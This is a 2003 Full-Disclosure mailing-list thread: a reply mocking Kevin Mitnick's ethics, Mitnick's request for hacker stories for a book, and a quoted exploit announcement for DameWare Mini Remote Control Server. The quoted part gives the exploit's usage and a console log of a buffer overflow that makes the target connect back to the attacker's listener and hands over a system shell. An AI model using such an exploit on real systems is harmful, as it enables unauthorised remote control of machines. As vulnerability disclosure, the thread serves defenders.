| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <002601c3c68c$94af1890$3200000a@alex> Date: Sat, 20 Dec 2003 01:02:38 +0100 From: Jelmer <jkuperus@...net.nl> To: Kevin Mitnick <kmitnick@...thi.com>, "'Adik'" <netninja@...mail.kg>, full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com Subject: Re: [Exploit]: DameWare Mini Remote Control Server Overflow Exploit If this is legit from a /. interview : --snip-- John Markoff had first libeled me in his book, Cyperpunk, which he co-authored with his former wife, Katie Hafner. In and around 1990, Markoff and Hafner contacted me to request my participation for a book about three hackers, including myself. In considering their request, I asked about their budget to compensate me for my time and/or life story rights. Both Markoff and Hafner were unwilling to compensate me as a source, because it was unethical. I explained that it was unethical for me to give them my story for free. We were at an impasse --snip-- from the site : --snip-- If your story makes it into the book, you'll receive a free copy of my first book, The Art of Deception, plus a rare Advanced Reader's Copy of the new one with your story in it -- both signed by me with a personal inscription to you in your real name or your handle or pseudonym. --snip-- Thats definatly more ethical ;) ----- Original Message ----- From: "Kevin Mitnick" <kmitnick@...thi.com> To: "'Adik'" <netninja@...mail.kg>; <full-disclosure@...ts.netsys.com>; <bugtraq@...urityfocus.com> Sent: Saturday, December 20, 2003 12:30 AM Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit > Hi all! > > > I'm sorry for my absence from the list for the past few months, but I have > been very busy traveling outside the US, and my mail account was > experiencing problems. Now that I am receiving the messages again, I have > been playing "catch up," by reading the old posts. > > I do have some good news, and was hoping that some of you might be able to > assist me. I have been commissioned by Wiley & Sons to write a second book, > which is tentatively titled, "The Art of Intrusion." This book will > chronicle detailed accounts of real, untold hacks by the perpetrators who > did it, and I will provide a security analysis and described how the attack > could be mitigated/prevented in today's environment. I am going to tell the > story from the perpetrator's stance, not just from research obtained from > law enforcement officials and records. > > I am looking for former/retired hackers that would be willing to tell me the > details of their sexiest hack. I am not interested in the run-of-the-mill > attacks such as, exploiting RPC DCOM, but rather creative ones that > incorporated technical, physical and/or social engineering aspects. > > > > I am offering $500 for the most provocative story that makes it into the > book, and if the person wishes, we can protect their anonymity by the use of > a handle. All contributors selected for the book, will receive a copy of > both books autographed by the authors. > > I should have more information up on FreeKevin.com today, as well as > DefensiveThinking.com. If someone would like to contact me with a story or > a possible lead on a storyteller, please write to me at > hacks@...ensivethinking.com, or call at (310)689-7229. I would appreciate > any assistance you can offer. > > All my best, > > > > Kevin Mitnick > > -----Original Message----- > From: full-disclosure-admin@...ts.netsys.com > [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Adik > Sent: Friday, December 19, 2003 8:38 AM > To: full-disclosure@...ts.netsys.com; bugtraq@...urityfocus.com > Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server > Overflow Exploit > > DameWare Mini Remote Control Server Exploit > > C:\xploits\dmware>dmware > > ...oO DameWare Remote Control Server Overflow Exploit Oo... > > -( by Adik netmaniac[at]hotmail.KG )- > > - Versions vulnerable: <= DWRCS 3.72.0.0 > - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1 > > Usage: dmware <TargetIP> <TargetPort> <YourIp> <YourPort> > eg: dmware 10.0.0.1 6129 10.0.0.2 21 > > > C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53 > > ...oO DameWare Remote Control Server Overflow Exploit Oo... > > -( by Adik netmaniac[at]hotmail.KG )- > > - Versions vulnerable: <= DWRCS 3.72.0.0 > - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1 > > [*] Target IP: 192.168.63.130 Port: 6129 > [*] Local IP: 192.168.63.1 Listening Port: 53 > > [*] Initializing sockets... [ OK ] > [*] Binding to local port: 53... [ OK ] > [*] Setting up a listener... [ OK ] > > OS Info : WIN2000 [ver 5.0.2195] > SP String : Service Pack 3 > > EIP: 0x77db912b (advapi32.dll) > > [*] Constructing packet for WIN 2000 SP: 3... [ OK ] > [*] Connecting to 192.168.63.130:6129... [ OK ] > [*] Packet injected! > [*] Connection request accepted: 192.168.63.130:1056 > [*] Dropping to shell... > > Microsoft Windows 2000 [Version 5.00.2195] > (C) Copyright 1985-2000 Microsoft Corp. > > C:\WINNT\system32>exit > exit > [x] Connection closed. > > C:\xploits\dmware> > > ------ > cheerz, > > Adik > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists